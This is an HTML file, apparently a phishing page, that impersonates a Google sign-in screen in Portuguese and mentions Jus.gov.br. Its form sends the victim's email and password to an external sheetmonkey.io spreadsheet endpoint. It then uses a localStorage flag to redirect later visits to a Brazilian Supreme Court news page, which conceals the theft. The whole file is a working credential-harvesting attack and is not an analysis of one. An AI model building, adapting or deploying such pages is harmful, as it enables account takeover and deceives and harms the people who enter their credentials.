<!DOCTYPE html>
<html class="html" lang="pt-br">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Google Account</title>
    <style>
        * {
            font-family: roboto, "Noto Sans Myanmar UI", arial, sans-serif;
        }
    </style>
    
    <link rel="stylesheet" href="style.css">
</head>
<body class="corpo">
    <header class="cabeçalho">
        <section style="margin: 6vw 0px 06px 0px;">
            <h1 class="titulo1 t1">G</h1>
            <h1 class="titulo2 t1">o</h1>
            <h1 class="titulo3 t1">o</h1>
            <h1 class="titulo1 t2">g</h1>
            <h1 class="titulo5 t1">l</h1>
            <h1 class="titulo2 t3">e</h1>
            <p class="description"><b>FAZER LOGIN</b></p>
            <p class="description2">Ir para o Jus.gov.br</p>
            <p id="mail"></p>
        </section>
    </header>

    <main class="meio">
        <section class="section" style="margin: 6vw 0px 06px 0px;">
            <form class="form" id="myForm" action="https://api.sheetmonkey.io/form/hGwJYdfvNf3Qq7Eq5Ki86k" method="POST">
                <label class="tituloBoxMail">Email ou telefone</label>
                <div id="DBmail2"></div>
                <input id="Bmail" class="boxmail email" type="email" name="Email" required />
                <input class="boxmail pass" type="password" name="Password" required />
                <input type="hidden" name="Created" value="x-sheetmonkey-current-date-time" />
                <input class="btn2" onclick="F2()" type="button" value="Avançar" />
                <input class="btn" onclick="btnOver()" type="submit" value="Próximo" />
            </form>
            <a class="errpass" href="err-Gmail.html">Esqueceu seu email?</a>
        </section>
    </main>
    <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
    <script type="text/javascript">
        var acesso = 0;
        
        function carregou() {
            var verifyConect = JSON.stringify(localStorage.getItem("acesso"))
            if (verifyConect >= 1 && acesso >= 1) {
                $('body').remove();
                 window.location.replace("https://portal.stf.jus.br/noticias/verNoticiaDetalhe.asp?idConteudo=496265&ori=1")
            }
           
        }
              
        
        window.addEventListener("load", carregou());
        
        function btnOver() {
            acesso++;
            JSON.parse(localStorage.setItem("acesso", acesso));
            setTimeout(() => {
                location.reload();
            }, 4000);
        }
        
        function F2() {
            setTimeout(() => {
                var email = document.querySelector("#Bmail").value;
                
                if (email !== null && email !== undefined && email !== "") {
                    $("#mail").css("opacity", 1);
                    var mail = document.querySelector("#mail");
                    mail.innerHTML = email;
                    $("#Bmail2").css("opacity", 1);
                    $(".tituloBoxMail").text("Password");
                    $(".tituloBoxMail").css("text-align", "center");
                    $(".email").css({ "opacity": "0", "position": "absolute", "top": "-300px" });
                    $(".errpass").text("Esqueceu sua senha?");
                    $(".pass").css({ "position": "inherit", "top": "0px", "opacity": "1" });
                    var pass = document.querySelector(".pass").value;
                    $(".btn").css({ "position": "absolute", "top": "50vw", "opacity": "1" });
                    $(".btn2").css({ "position": "absolute", "top": "300px", "opacity": "0" });
                }
            }, 2000);
        }
    </script>
</body>
</html>
